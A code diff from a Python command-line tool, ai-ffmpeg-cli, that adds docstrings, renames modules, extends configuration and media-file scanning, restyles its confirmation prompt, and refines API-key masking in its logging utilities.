@@ -31,6 +50,7 @@ def build_commands(plan: CommandPlan, assume_yes: bool = False) -> list[list[str
|
||||
if val is not None:
|
||||
bucket.append(val)
|
||||
|
||||
# Build command with proper flag ordering
|
||||
cmd.extend(pre_input_flags)
|
||||
cmd.extend(["-i", str(entry.input)])
|
||||
for extra in entry.extra_inputs:
|
||||
@@ -47,7 +67,7 @@ def build_commands(plan: CommandPlan, assume_yes: bool = False) -> list[list[str
|
||||
# Apply broad defaults below.
|
||||
|
||||
if "-vframes" in entry.args:
|
||||
# thumbnail
|
||||
# thumbnail action detected
|
||||
pass
|
||||
|
||||
# If overlay is intended, builder must add filter_complex
|
||||
@@ -73,7 +93,7 @@ def build_commands(plan: CommandPlan, assume_yes: bool = False) -> list[list[str
|
||||
if "compress" in summary and "-crf" not in existing_args_str:
|
||||
cmd.extend(["-crf", "28"])
|
||||
if "frames" in summary and "fps=" not in existing_args_str:
|
||||
# default fps = 1/5
|
||||
# default fps = 1/5 for frame extraction
|
||||
cmd.extend(["-vf", "fps=1/5"])
|
||||
if "overlay" in summary and "-filter_complex" not in entry.args:
|
||||
# default top-right overlay with 10px margins
|
||||
@@ -89,8 +109,8 @@ def build_commands(plan: CommandPlan, assume_yes: bool = False) -> list[list[str
|
||||
|
||||
cmd.append(str(entry.output))
|
||||
|
||||
# Validate the command before adding it
|
||||
from .io_utils import validate_ffmpeg_command
|
||||
# Validate the command before adding it for security
|
||||
from .file_operations import validate_ffmpeg_command
|
||||
|
||||
if not validate_ffmpeg_command(cmd):
|
||||
logger.warning(f"Generated command failed validation: {' '.join(cmd[:5])}...")
|
||||
|
||||
@@ -1,3 +1,9 @@
|
||||
"""Configuration management for ai-ffmpeg-cli.
|
||||
|
||||
This module handles loading, validation, and management of application
|
||||
configuration from environment variables and .env files.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
@@ -9,35 +15,41 @@ from pydantic import Field
|
||||
from pydantic import ValidationError
|
||||
from pydantic import field_validator
|
||||
|
||||
from .errors import ConfigError
|
||||
from .security import create_secure_logger
|
||||
from .security import mask_api_key
|
||||
from .security import validate_api_key_format
|
||||
from .credential_security import create_secure_logger
|
||||
from .credential_security import mask_api_key
|
||||
from .credential_security import validate_api_key_format
|
||||
from .custom_exceptions import ConfigError
|
||||
|
||||
# Create secure logger that masks sensitive information
|
||||
logger = create_secure_logger(__name__)
|
||||
|
||||
|
||||
class AppConfig(BaseModel):
|
||||
"""Runtime configuration loaded from environment variables.
|
||||
|
||||
Provides a centralized configuration interface with validation
|
||||
and secure handling of sensitive data like API keys.
|
||||
|
||||
Attributes
|
||||
----------
|
||||
openai_api_key: SecretStr
|
||||
API key for OpenAI provider. Securely wrapped to prevent accidental exposure.
|
||||
openai_api_key: str | None
|
||||
API key for OpenAI provider. Can be None if not set.
|
||||
model: str
|
||||
Model name to use for parsing intents.
|
||||
Model name to use for parsing intents (default: gpt-5).
|
||||
dry_run: bool
|
||||
If True, only preview commands and do not execute.
|
||||
confirm_default: bool
|
||||
Default value for confirmation prompts (True means default Yes).
|
||||
timeout_seconds: int
|
||||
Timeout in seconds for LLM parsing requests.
|
||||
Timeout in seconds for LLM parsing requests (1-300 seconds).
|
||||
max_file_size: int
|
||||
Maximum allowed file size in bytes (default: 500MB).
|
||||
allowed_directories: list[str]
|
||||
List of directories where file operations are allowed.
|
||||
rate_limit_requests: int
|
||||
Maximum API requests per minute.
|
||||
Maximum API requests per minute (1-1000).
|
||||
output_directory: str
|
||||
Directory where generated output assets will be stored (default: "aiclip").
|
||||
"""
|
||||
|
||||
openai_api_key: str | None = Field(default=None)
|
||||
@@ -50,16 +62,33 @@ class AppConfig(BaseModel):
|
||||
max_file_size: int = Field(default=500 * 1024 * 1024) # 500MB
|
||||
allowed_directories: list[str] = Field(default_factory=lambda: [os.getcwd()])
|
||||
rate_limit_requests: int = Field(default=60, ge=1, le=1000) # requests per minute
|
||||
output_directory: str = Field(default="aiclip")
|
||||
|
||||
@field_validator("model")
|
||||
@classmethod
|
||||
def validate_model(cls, v: str) -> str:
|
||||
"""Validate model name format."""
|
||||
"""Validate model name format and warn about non-standard models.
|
||||
|
||||
Ensures the model name is valid and warns when using models
|
||||
not in the standard allowed list.
|
||||
|
||||
Args:
|
||||
v: Model name to validate
|
||||
|
||||
Returns:
|
||||
Validated model name
|
||||
|
||||
Raises:
|
||||
ValueError: When model name is empty or invalid
|
||||
"""
|
||||
if not v or not isinstance(v, str):
|
||||
raise ValueError("Model name is required")
|
||||
|
||||
# Allow common OpenAI models
|
||||
allowed_models = {
|
||||
"gpt-5",
|
||||
"gpt-5-mini",
|
||||
"gpt-5-nano",
|
||||
"gpt-4o",
|
||||
"gpt-4o-mini",
|
||||
"gpt-4",
|
||||
@@ -76,7 +105,17 @@ class AppConfig(BaseModel):
|
||||
@field_validator("allowed_directories", mode="before")
|
||||
@classmethod
|
||||
def validate_directories(cls, v: list[str] | str) -> list[str]:
|
||||
"""Validate and normalize allowed directories."""
|
||||
"""Validate and normalize allowed directories.
|
||||
|
||||
Converts string input to list, validates directory existence,
|
||||
and provides fallback to current directory if no valid directories.
|
||||
|
||||
Args:
|
||||
v: Directory path(s) as string or list of strings
|
||||
|
||||
Returns:
|
||||
List of validated absolute directory paths
|
||||
"""
|
||||
if isinstance(v, str):
|
||||
v = [v]
|
||||
|
||||
@@ -97,15 +136,68 @@ class AppConfig(BaseModel):
|
||||
|
||||
return validated_dirs
|
||||
|
||||
@field_validator("output_directory")
|
||||
@classmethod
|
||||
def validate_output_directory(cls, v: str) -> str:
|
||||
"""Validate and normalize output directory.
|
||||
|
||||
Ensures the output directory is a valid path and creates it if it doesn't exist.
|
||||
|
||||
Args:
|
||||
v: Output directory path as string
|
||||
|
||||
Returns:
|
||||
Validated absolute output directory path
|
||||
"""
|
||||
if not v or not isinstance(v, str):
|
||||
raise ValueError("Output directory is required")
|
||||
|
||||
try:
|
||||
abs_path = os.path.abspath(v)
|
||||
# Create directory if it doesn't exist
|
||||
if not os.path.exists(abs_path):
|
||||
os.makedirs(abs_path, exist_ok=True)
|
||||
logger.info(f"Created output directory: {abs_path}")
|
||||
elif not os.path.isdir(abs_path):
|
||||
raise ValueError(f"Output directory path exists but is not a directory: {v}")
|
||||
|
||||
return abs_path
|
||||
except (OSError, ValueError) as e:
|
||||
logger.warning(f"Invalid output directory path {v}: {e}")
|
||||
# Fallback to "aiclip" in current directory
|
||||
fallback_path = os.path.abspath("aiclip")
|
||||
try:
|
||||
os.makedirs(fallback_path, exist_ok=True)
|
||||
logger.info(f"Using fallback output directory: {fallback_path}")
|
||||
return fallback_path
|
||||
except OSError:
|
||||
# Last resort: use current directory
|
||||
logger.warning("Could not create output directory, using current directory")
|
||||
return os.getcwd()
|
||||
|
||||
def validate_ffmpeg_available(self) -> None:
|
||||
"""Validate that ffmpeg is available in PATH."""
|
||||
"""Validate that ffmpeg is available in PATH.
|
||||
|
||||
Checks if ffmpeg executable is accessible in the system PATH.
|
||||
Required for all video processing operations.
|
||||
|
||||
Raises:
|
||||
ConfigError: When ffmpeg is not found in PATH
|
||||
"""
|
||||
if shutil.which("ffmpeg") is None:
|
||||
raise ConfigError(
|
||||
"ffmpeg not found in PATH. Please install ffmpeg (e.g., brew install ffmpeg) and retry."
|
||||
)
|
||||
|
||||
def validate_api_key_for_use(self) -> None:
|
||||
"""Validate API key is present and properly formatted for use."""
|
||||
"""Validate API key is present and properly formatted for use.
|
||||
|
||||
Checks that the API key exists and follows the correct format
|
||||
before allowing it to be used for API calls.
|
||||
|
||||
Raises:
|
||||
ConfigError: When API key is missing or invalid
|
||||
"""
|
||||
if not self.openai_api_key:
|
||||
raise ConfigError(
|
||||
"OPENAI_API_KEY is required for LLM parsing. "
|
||||
@@ -121,7 +213,17 @@ class AppConfig(BaseModel):
|
||||
)
|
||||
|
||||
def get_api_key_for_client(self) -> str:
|
||||
"""Get the API key value for client use. Validates first."""
|
||||
"""Get the API key value for client use. Validates first.
|
||||
|
||||
Validates the API key format and presence before returning
|
||||
it for use in API clients.
|
||||
|
||||
Returns:
|
||||
Validated API key string
|
||||
|
||||
Raises:
|
||||
ConfigError: When API key validation fails
|
||||
"""
|
||||
self.validate_api_key_for_use()
|
||||
return self.openai_api_key # type: ignore
|
||||
|
||||
@@ -129,24 +231,27 @@ class AppConfig(BaseModel):
|
||||
def load_config() -> AppConfig:
|
||||
"""Load configuration from environment variables and validate environment.
|
||||
|
||||
Loads configuration from environment variables and .env files,
|
||||
validates all settings, and ensures required dependencies are available.
|
||||
|
||||
Returns
|
||||
-------
|
||||
AppConfig
|
||||
Parsed configuration instance.
|
||||
Parsed and validated configuration instance.
|
||||
|
||||
Raises
|
||||
------
|
||||
ConfigError
|
||||
If configuration is invalid or required dependencies are missing.
|
||||
"""
|
||||
# Load environment variables from .env file
|
||||
# Load environment variables from .env file (don't override existing env vars)
|
||||
load_dotenv(override=False)
|
||||
|
||||
try:
|
||||
# Get API key from environment
|
||||
api_key = os.getenv("OPENAI_API_KEY")
|
||||
|
||||
# Get allowed directories (comma-separated list)
|
||||
# Parse allowed directories from comma-separated environment variable
|
||||
allowed_dirs_str = os.getenv("AICLIP_ALLOWED_DIRS", "")
|
||||
allowed_dirs = (
|
||||
[d.strip() for d in allowed_dirs_str.split(",") if d.strip()]
|
||||
@@ -154,17 +259,20 @@ def load_config() -> AppConfig:
|
||||
else []
|
||||
)
|
||||
|
||||
# Create configuration instance with environment values
|
||||
config = AppConfig(
|
||||
openai_api_key=api_key,
|
||||
allowed_directories=allowed_dirs or [os.getcwd()],
|
||||
timeout_seconds=int(os.getenv("AICLIP_TIMEOUT", "60")),
|
||||
max_file_size=int(os.getenv("AICLIP_MAX_FILE_SIZE", str(500 * 1024 * 1024))),
|
||||
rate_limit_requests=int(os.getenv("AICLIP_RATE_LIMIT", "60")),
|
||||
output_directory=os.getenv("AICLIP_OUTPUT_DIR", "aiclip"),
|
||||
)
|
||||
|
||||
logger.debug(f"Configuration loaded successfully with API key: {mask_api_key(api_key)}")
|
||||
|
||||
except (ValidationError, ValueError) as exc:
|
||||
# Sanitize error messages to prevent API key exposure
|
||||
sanitized_error = str(exc).replace(api_key or "", "***API_KEY***") if api_key else str(exc)
|
||||
raise ConfigError(
|
||||
f"Configuration validation failed: {sanitized_error}. "
|
||||
|
||||
@@ -1,14 +1,73 @@
|
||||
"""User confirmation utilities for ai-ffmpeg-cli.
|
||||
|
||||
This module provides utilities for prompting users for confirmation
|
||||
before executing potentially destructive operations.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from rich.console import Console
|
||||
from rich.panel import Panel
|
||||
from rich.prompt import Confirm
|
||||
from rich.text import Text
|
||||
|
||||
# Initialize console for Rich output
|
||||
console = Console()
|
||||
|
||||
|
||||
def confirm_prompt(question: str, default_yes: bool = True, assume_yes: bool = False) -> bool:
|
||||
"""Prompt user for confirmation with configurable defaults.
|
||||
|
||||
Displays a confirmation prompt to the user and returns their response.
|
||||
Supports configurable defaults and automatic yes responses for
|
||||
non-interactive scenarios.
|
||||
|
||||
Args:
|
||||
question: The question to ask the user
|
||||
default_yes: Whether the default response should be yes (Y/n vs y/N)
|
||||
assume_yes: Whether to automatically return True without prompting
|
||||
|
||||
Returns:
|
||||
True if user confirms, False if user declines
|
||||
|
||||
Note:
|
||||
Handles EOFError gracefully by returning the default response
|
||||
"""
|
||||
if assume_yes:
|
||||
return True
|
||||
default = "Y/n" if default_yes else "y/N"
|
||||
|
||||
# Set up the prompt with appropriate default indicator
|
||||
default_choice = "Y" if default_yes else "N"
|
||||
|
||||
# Create styled confirmation prompt
|
||||
prompt_text = Text()
|
||||
prompt_text.append(question, style="bold white")
|
||||
|
||||
# Create confirmation panel
|
||||
confirm_panel = Panel(
|
||||
prompt_text,
|
||||
title="[bold cyan]Confirmation Required[/bold cyan]",
|
||||
border_style="cyan",
|
||||
padding=(1, 2),
|
||||
)
|
||||
|
||||
try:
|
||||
resp = input(f"{question} [{default}] ").strip().lower()
|
||||
console.print(confirm_panel)
|
||||
# Use Rich's Confirm prompt for better integration
|
||||
is_affirmative = Confirm.ask(
|
||||
"",
|
||||
default=default_yes,
|
||||
show_default=False, # We already show the default in the panel
|
||||
console=console,
|
||||
)
|
||||
|
||||
# Show user's choice
|
||||
choice_display = "Yes" if is_affirmative else "No"
|
||||
console.print(f"[dim]User choice: {choice_display}[/dim]")
|
||||
|
||||
return is_affirmative
|
||||
|
||||
except EOFError:
|
||||
# Handle Ctrl+D gracefully by returning default
|
||||
console.print(f"[dim]Using default: {default_choice}[/dim]")
|
||||
return default_yes
|
||||
if not resp:
|
||||
return default_yes
|
||||
return resp in {"y", "yes"}
|
||||
|
||||
@@ -1,72 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import shutil
|
||||
import subprocess # nosec B404: subprocess is used safely with explicit args and no shell
|
||||
from pathlib import Path
|
||||
|
||||
from .io_utils import most_recent_file
|
||||
|
||||
MEDIA_EXTS = {
|
||||
"video": {".mp4", ".mov", ".mkv", ".webm", ".avi"},
|
||||
"audio": {".mp3", ".aac", ".wav", ".m4a", ".flac"},
|
||||
"image": {".png", ".jpg", ".jpeg"},
|
||||
}
|
||||
|
||||
|
||||
def _ffprobe_duration(path: Path) -> float | None:
|
||||
ffprobe_path = shutil.which("ffprobe")
|
||||
if ffprobe_path is None:
|
||||
return None
|
||||
try:
|
||||
# Call ffprobe with explicit args and no shell
|
||||
result = subprocess.run( # nosec B603, B607
|
||||
[
|
||||
"ffprobe",
|
||||
"-v",
|
||||
"error",
|
||||
"-show_entries",
|
||||
"format=duration",
|
||||
"-of",
|
||||
"json",
|
||||
str(path),
|
||||
],
|
||||
capture_output=True,
|
||||
check=True,
|
||||
text=True,
|
||||
)
|
||||
data = json.loads(result.stdout)
|
||||
dur = data.get("format", {}).get("duration")
|
||||
return float(dur) if dur is not None else None
|
||||
except Exception:
|
||||
return None
|
||||
|
||||
|
||||
def scan(cwd: Path | None = None) -> dict[str, object]:
|
||||
base = cwd or Path.cwd()
|
||||
files: list[Path] = [p for p in base.iterdir() if p.is_file()]
|
||||
|
||||
videos = [p for p in files if p.suffix.lower() in MEDIA_EXTS["video"]]
|
||||
audios = [p for p in files if p.suffix.lower() in MEDIA_EXTS["audio"]]
|
||||
images = [p for p in files if p.suffix.lower() in MEDIA_EXTS["image"]]
|
||||
|
||||
most_recent_video = most_recent_file(videos)
|
||||
|
||||
info = []
|
||||
for p in videos + audios:
|
||||
info.append(
|
||||
{
|
||||
"path": str(p),
|
||||
"size": p.stat().st_size if p.exists() else None,
|
||||
"duration": _ffprobe_duration(p),
|
||||
}
|
||||
)
|
||||
|
||||
return {
|
||||
"cwd": str(base),
|
||||
"videos": [str(p) for p in videos],
|
||||
"audios": [str(p) for p in audios],
|
||||
"images": [str(p) for p in images],
|
||||
"most_recent_video": str(most_recent_video) if most_recent_video else None,
|
||||
"info": info,
|
||||
}
|
||||
269
src/ai_ffmpeg_cli/context_scanner_basic.py
Normal file
269
src/ai_ffmpeg_cli/context_scanner_basic.py
Normal file
@@ -0,0 +1,269 @@
|
||||
"""Basic context scanner for ai-ffmpeg-cli.
|
||||
|
||||
This module provides basic file context scanning functionality,
|
||||
identifying media files in the current directory for LLM context.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import shutil
|
||||
import subprocess # nosec B404: subprocess is used safely with explicit args and no shell
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
from rich.console import Console
|
||||
from rich.table import Table
|
||||
|
||||
from .file_operations import most_recent_file
|
||||
|
||||
# Initialize console for Rich output
|
||||
console = Console()
|
||||
|
||||
# Supported media file extensions for context scanning
|
||||
MEDIA_EXTS = {
|
||||
"video": {".mp4", ".mov", ".mkv", ".webm", ".avi", ".m4v", ".3gp", ".flv", ".wmv"},
|
||||
"audio": {".mp3", ".aac", ".wav", ".m4a", ".flac", ".ogg", ".wma", ".opus"},
|
||||
"image": {".png", ".jpg", ".jpeg", ".gif", ".bmp", ".tiff", ".webp"},
|
||||
"subtitle": {".srt", ".vtt", ".ass", ".ssa", ".sub", ".idx"},
|
||||
}
|
||||
|
||||
|
||||
def _format_file_size(size_bytes: int) -> str:
|
||||
"""Format file size in human-readable format.
|
||||
|
||||
Args:
|
||||
size_bytes: Size in bytes
|
||||
|
||||
Returns:
|
||||
Formatted size string
|
||||
"""
|
||||
if size_bytes < 1024:
|
||||
return f"{size_bytes} B"
|
||||
elif size_bytes < 1024 * 1024:
|
||||
return f"{size_bytes / 1024:.1f} KB"
|
||||
elif size_bytes < 1024 * 1024 * 1024:
|
||||
return f"{size_bytes / (1024 * 1024):.1f} MB"
|
||||
else:
|
||||
return f"{size_bytes / (1024 * 1024 * 1024):.1f} GB"
|
||||
|
||||
|
||||
def _format_duration(seconds: float | None) -> str:
|
||||
"""Format duration in human-readable format.
|
||||
|
||||
Args:
|
||||
seconds: Duration in seconds
|
||||
|
||||
Returns:
|
||||
Formatted duration string
|
||||
"""
|
||||
if seconds is None:
|
||||
return "Unknown"
|
||||
|
||||
hours = int(seconds // 3600)
|
||||
minutes = int((seconds % 3600) // 60)
|
||||
secs = int(seconds % 60)
|
||||
|
||||
if hours > 0:
|
||||
return f"{hours:02d}:{minutes:02d}:{secs:02d}"
|
||||
else:
|
||||
return f"{minutes:02d}:{secs:02d}"
|
||||
|
||||
|
||||
def _ffprobe_duration(path: Path) -> float | None:
|
||||
"""Extract duration of a media file using ffprobe.
|
||||
|
||||
Uses ffprobe to get the duration of video or audio files
|
||||
for context information.
|
||||
|
||||
Args:
|
||||
path: Path to the media file
|
||||
|
||||
Returns:
|
||||
Duration in seconds, or None if ffprobe is unavailable or fails
|
||||
"""
|
||||
ffprobe_path = shutil.which("ffprobe")
|
||||
if ffprobe_path is None:
|
||||
return None
|
||||
try:
|
||||
# Call ffprobe with explicit args and no shell for security
|
||||
result = subprocess.run( # nosec B603, B607
|
||||
[
|
||||
"ffprobe",
|
||||
"-v",
|
||||
"error",
|
||||
"-show_entries",
|
||||
"format=duration",
|
||||
"-of",
|
||||
"json",
|
||||
str(path),
|
||||
],
|
||||
capture_output=True,
|
||||
check=True,
|
||||
text=True,
|
||||
)
|
||||
data = json.loads(result.stdout)
|
||||
dur = data.get("format", {}).get("duration")
|
||||
return float(dur) if dur is not None else None
|
||||
except Exception:
|
||||
# Return None for any ffprobe errors
|
||||
return None
|
||||
|
||||
|
||||
def _display_scan_summary(context: dict) -> None:
|
||||
"""Display a summary of the scan results using Rich.
|
||||
|
||||
Args:
|
||||
context: Context dictionary from scan()
|
||||
"""
|
||||
# Create summary table
|
||||
summary_table = Table(
|
||||
title="[bold blue]Scan Summary[/bold blue]", show_header=False, box=None
|
||||
)
|
||||
summary_table.add_column("Category", style="bold cyan")
|
||||
summary_table.add_column("Count", style="bold green", justify="center")
|
||||
summary_table.add_column("Details", style="white")
|
||||
|
||||
# Add video files
|
||||
videos = context.get("videos", [])
|
||||
if videos:
|
||||
total_size = sum(Path(v).stat().st_size for v in videos if Path(v).exists())
|
||||
summary_table.add_row(
|
||||
"Videos",
|
||||
str(len(videos)),
|
||||
f"Total size: {_format_file_size(total_size)}",
|
||||
)
|
||||
|
||||
# Add audio files
|
||||
audios = context.get("audios", [])
|
||||
if audios:
|
||||
total_size = sum(Path(a).stat().st_size for a in audios if Path(a).exists())
|
||||
summary_table.add_row(
|
||||
"Audio", str(len(audios)), f"Total size: {_format_file_size(total_size)}"
|
||||
)
|
||||
|
||||
# Add image files
|
||||
images = context.get("images", [])
|
||||
if images:
|
||||
total_size = sum(Path(i).stat().st_size for i in images if Path(i).exists())
|
||||
summary_table.add_row(
|
||||
"Images", str(len(images)), f"Total size: {_format_file_size(total_size)}"
|
||||
)
|
||||
|
||||
# Add subtitle files
|
||||
subtitle_files = context.get("subtitle_files", [])
|
||||
if subtitle_files:
|
||||
summary_table.add_row(
|
||||
"Subtitles", str(len(subtitle_files)), "Ready for processing"
|
||||
)
|
||||
|
||||
if summary_table.row_count > 0:
|
||||
console.print(summary_table)
|
||||
console.print()
|
||||
|
||||
|
||||
def _display_detailed_file_info(context: dict) -> None:
|
||||
"""Display detailed file information in a table format.
|
||||
|
||||
Args:
|
||||
context: Context dictionary from scan()
|
||||
"""
|
||||
info = context.get("info", [])
|
||||
if not info:
|
||||
return
|
||||
|
||||
# Create detailed file table
|
||||
file_table = Table(title="[bold green]File Details[/bold green]")
|
||||
file_table.add_column("File", style="bold white")
|
||||
file_table.add_column("Size", style="cyan", justify="right")
|
||||
file_table.add_column("Duration", style="yellow", justify="center")
|
||||
file_table.add_column("Type", style="bold", justify="center")
|
||||
|
||||
for file_info in info:
|
||||
path = Path(file_info["path"])
|
||||
size = file_info.get("size", 0)
|
||||
duration = file_info.get("duration")
|
||||
|
||||
# Determine file type
|
||||
ext = path.suffix.lower()
|
||||
if ext in MEDIA_EXTS["video"]:
|
||||
file_type = "Video"
|
||||
elif ext in MEDIA_EXTS["audio"]:
|
||||
file_type = "Audio"
|
||||
else:
|
||||
file_type = "Other"
|
||||
|
||||
file_table.add_row(
|
||||
path.name,
|
||||
_format_file_size(size) if size else "Unknown",
|
||||
_format_duration(duration),
|
||||
file_type,
|
||||
)
|
||||
|
||||
if file_table.row_count > 0:
|
||||
console.print(file_table)
|
||||
console.print()
|
||||
|
||||
|
||||
def scan(cwd: Path | None = None, show_summary: bool = True) -> dict[str, Any]:
|
||||
"""Scan current directory for media files and build context.
|
||||
|
||||
Scans the specified directory (or current working directory)
|
||||
for media files and builds a context dictionary containing
|
||||
file information for LLM processing.
|
||||
|
||||
Args:
|
||||
cwd: Directory to scan (defaults to current working directory)
|
||||
show_summary: Whether to display scan summary (default: True)
|
||||
|
||||
Returns:
|
||||
Dictionary containing:
|
||||
- cwd: Current working directory path
|
||||
- videos: List of video file paths
|
||||
- audios: List of audio file paths
|
||||
- images: List of image file paths
|
||||
- subtitle_files: List of subtitle file paths
|
||||
- most_recent_video: Path to most recently modified video
|
||||
- info: List of file info dictionaries with path, size, and duration
|
||||
"""
|
||||
base = cwd or Path.cwd()
|
||||
files: list[Path] = []
|
||||
# Scan current directory only for media files
|
||||
files.extend([p for p in base.iterdir() if p.is_file()])
|
||||
|
||||
# Categorize files by media type
|
||||
videos = [p for p in files if p.suffix.lower() in MEDIA_EXTS["video"]]
|
||||
audios = [p for p in files if p.suffix.lower() in MEDIA_EXTS["audio"]]
|
||||
images = [p for p in files if p.suffix.lower() in MEDIA_EXTS["image"]]
|
||||
subtitle_files = [p for p in files if p.suffix.lower() in MEDIA_EXTS["subtitle"]]
|
||||
|
||||
# Find the most recently modified video file
|
||||
most_recent_video = most_recent_file(videos)
|
||||
|
||||
# Build detailed info for video and audio files
|
||||
info = []
|
||||
for p in videos + audios:
|
||||
info.append(
|
||||
{
|
||||
"path": str(p),
|
||||
"size": p.stat().st_size if p.exists() else None,
|
||||
"duration": _ffprobe_duration(p),
|
||||
}
|
||||
)
|
||||
|
||||
context = {
|
||||
"cwd": str(base),
|
||||
"videos": [str(p) for p in videos],
|
||||
"audios": [str(p) for p in audios],
|
||||
"images": [str(p) for p in images],
|
||||
"subtitle_files": [str(p) for p in subtitle_files],
|
||||
"most_recent_video": str(most_recent_video) if most_recent_video else None,
|
||||
"info": info,
|
||||
}
|
||||
|
||||
# Display scan summary if requested
|
||||
if show_summary:
|
||||
_display_scan_summary(context)
|
||||
_display_detailed_file_info(context)
|
||||
|
||||
return context
|
||||
@@ -1,8 +1,7 @@
|
||||
"""Context scanner for ai-ffmpeg-cli.
|
||||
"""Extended context scanner for ai-ffmpeg-cli.
|
||||
|
||||
This module scans the current working directory to identify available media files
|
||||
and provides context information for natural language processing. It detects
|
||||
videos, audio files, and images, and extracts metadata like duration and file size.
|
||||
This module provides enhanced context scanning functionality for the ai-ffmpeg-cli
|
||||
package, including comprehensive media file detection and metadata extraction.
|
||||
|
||||
Key features:
|
||||
- Media file detection by extension
|
||||
@@ -24,7 +23,7 @@ import shutil
|
||||
import subprocess # nosec B404: subprocess is used safely with explicit args and no shell
|
||||
from pathlib import Path
|
||||
|
||||
from .file_security import most_recent_file
|
||||
from .path_security import most_recent_file
|
||||
|
||||
# Supported media file extensions by category
|
||||
MEDIA_EXTS = {
|
||||
@@ -100,12 +99,12 @@ def scan(cwd: Path | None = None) -> dict[str, object]:
|
||||
base = cwd or Path.cwd()
|
||||
files: list[Path] = [p for p in base.iterdir() if p.is_file()]
|
||||
|
||||
# Categorize files by media type
|
||||
# Categorize files by media type using extension matching
|
||||
videos = [p for p in files if p.suffix.lower() in MEDIA_EXTS["video"]]
|
||||
audios = [p for p in files if p.suffix.lower() in MEDIA_EXTS["audio"]]
|
||||
images = [p for p in files if p.suffix.lower() in MEDIA_EXTS["image"]]
|
||||
|
||||
# Find the most recently modified video file
|
||||
# Find the most recently modified video file for context
|
||||
most_recent_video = most_recent_file(videos)
|
||||
|
||||
# Collect detailed metadata for videos and audio files
|
||||
@@ -1,22 +1,33 @@
|
||||
"""Security utilities for handling sensitive data and credentials."""
|
||||
"""Security utilities for handling sensitive data and credentials.
|
||||
|
||||
This module provides utilities for secure handling of API keys and other
|
||||
sensitive information, including masking, validation, and secure logging.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import re
|
||||
from typing import TYPE_CHECKING
|
||||
from typing import Any
|
||||
|
||||
if TYPE_CHECKING:
|
||||
from pydantic_core.core_schema import AfterValidatorFunctionSchema # noqa: TC003
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def mask_api_key(api_key: str | None) -> str:
|
||||
"""Mask API key for safe display in logs and errors.
|
||||
|
||||
Creates a masked version of an API key that shows only the first
|
||||
and last few characters, preventing accidental exposure in logs.
|
||||
|
||||
Args:
|
||||
api_key: The API key to mask
|
||||
|
||||
Returns:
|
||||
str: Masked version safe for logging
|
||||
str: Masked version safe for logging and error messages
|
||||
"""
|
||||
if not api_key or not isinstance(api_key, str):
|
||||
return "***NO_KEY***"
|
||||
@@ -31,6 +42,9 @@ def mask_api_key(api_key: str | None) -> str:
|
||||
def validate_api_key_format(api_key: str | None) -> bool:
|
||||
"""Validate API key has expected format without logging the key.
|
||||
|
||||
Checks that the API key follows the expected OpenAI format
|
||||
without exposing the actual key value.
|
||||
|
||||
Args:
|
||||
api_key: The API key to validate
|
||||
|
||||
@@ -40,11 +54,15 @@ def validate_api_key_format(api_key: str | None) -> bool:
|
||||
if not api_key or not isinstance(api_key, str):
|
||||
return False
|
||||
|
||||
# OpenAI API keys start with 'sk-' and have specific length/format
|
||||
# OpenAI API keys start with 'sk-' and can include various formats:
|
||||
# - sk-... (standard keys)
|
||||
# - sk-proj-... (project keys)
|
||||
# - sk-org-... (organization keys)
|
||||
if api_key.startswith("sk-"):
|
||||
# Remove prefix and check remaining characters
|
||||
key_body = api_key[3:]
|
||||
if len(key_body) >= 32 and re.match(r"^[a-zA-Z0-9]+$", key_body):
|
||||
# Allow alphanumeric characters, hyphens, and underscores
|
||||
if len(key_body) >= 32 and re.match(r"^[a-zA-Z0-9_-]+$", key_body):
|
||||
return True
|
||||
|
||||
return False
|
||||
@@ -53,16 +71,19 @@ def validate_api_key_format(api_key: str | None) -> bool:
|
||||
def sanitize_error_message(message: str) -> str:
|
||||
"""Remove sensitive information from error messages.
|
||||
|
||||
Scans error messages for patterns that might contain sensitive
|
||||
data and replaces them with safe placeholders.
|
||||
|
||||
Args:
|
||||
message: Original error message
|
||||
|
||||
Returns:
|
||||
str: Sanitized error message
|
||||
str: Sanitized error message with sensitive data masked
|
||||
"""
|
||||
if not message:
|
||||
return ""
|
||||
|
||||
# Patterns to mask
|
||||
# Patterns to mask for security
|
||||
patterns = [
|
||||
# API keys
|
||||
(r"sk-[a-zA-Z0-9]{10,}", "***API_KEY***"),
|
||||
@@ -84,13 +105,29 @@ def sanitize_error_message(message: str) -> str:
|
||||
|
||||
|
||||
class SecureLogger:
|
||||
"""Logger wrapper that automatically sanitizes sensitive data."""
|
||||
"""Logger wrapper that automatically sanitizes sensitive data.
|
||||
|
||||
Provides a drop-in replacement for the standard logger that
|
||||
automatically masks sensitive information in all log messages.
|
||||
"""
|
||||
|
||||
def __init__(self, logger_name: str):
|
||||
"""Initialize secure logger with the given name.
|
||||
|
||||
Args:
|
||||
logger_name: Name for the underlying logger
|
||||
"""
|
||||
self.logger = logging.getLogger(logger_name)
|
||||
|
||||
def _sanitize_args(self, args: tuple[Any, ...]) -> tuple[Any, ...]:
|
||||
"""Sanitize logging arguments to remove sensitive data."""
|
||||
"""Sanitize logging arguments to remove sensitive data.
|
||||
|
||||
Args:
|
||||
args: Logging arguments to sanitize
|
||||
|
||||
Returns:
|
||||
Tuple of sanitized arguments
|
||||
"""
|
||||
return tuple(
|
||||
sanitize_error_message(str(arg)) if isinstance(arg, str) else arg for arg in args
|
||||
)
|
||||
@@ -119,6 +156,9 @@ class SecureLogger:
|
||||
def create_secure_logger(name: str) -> SecureLogger:
|
||||
"""Create a logger that automatically sanitizes sensitive data.
|
||||
|
||||
Factory function to create a secure logger instance that will
|
||||
automatically mask sensitive information in all log messages.
|
||||
|
||||
Args:
|
||||
name: Logger name
|
||||
|
||||
@@ -129,40 +169,67 @@ def create_secure_logger(name: str) -> SecureLogger:
|
||||
|
||||
|
||||
class SecretStr:
|
||||
"""String wrapper that prevents accidental exposure of sensitive data."""
|
||||
"""String wrapper that prevents accidental exposure of sensitive data.
|
||||
|
||||
Provides a safe wrapper around sensitive strings that prevents
|
||||
accidental logging or display of the actual value.
|
||||
"""
|
||||
|
||||
